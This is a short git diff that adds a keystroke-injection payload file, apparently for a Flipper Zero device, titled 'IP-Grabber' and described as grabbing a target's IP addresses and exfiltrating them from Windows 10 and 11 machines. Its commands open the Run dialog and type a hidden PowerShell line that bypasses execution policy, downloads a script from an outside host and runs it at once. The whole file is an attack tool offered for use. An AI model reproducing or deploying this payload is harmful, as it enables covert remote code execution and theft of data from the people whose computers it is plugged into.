diff --git a/Payloads/Flip-IP-Grabber/IP-Grabber.txt b/Payloads/Flip-IP-Grabber/IP-Grabber.txt new file mode 100644 index 0000000..db2868c --- /dev/null +++ b/Payloads/Flip-IP-Grabber/IP-Grabber.txt @@ -0,0 +1,12 @@ +REM Title: IP-Grabber + +REM Author: I am Jakoby + +REM Description: This payload is meant to do grab your targets IP addresses and exfil them + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex +ENTER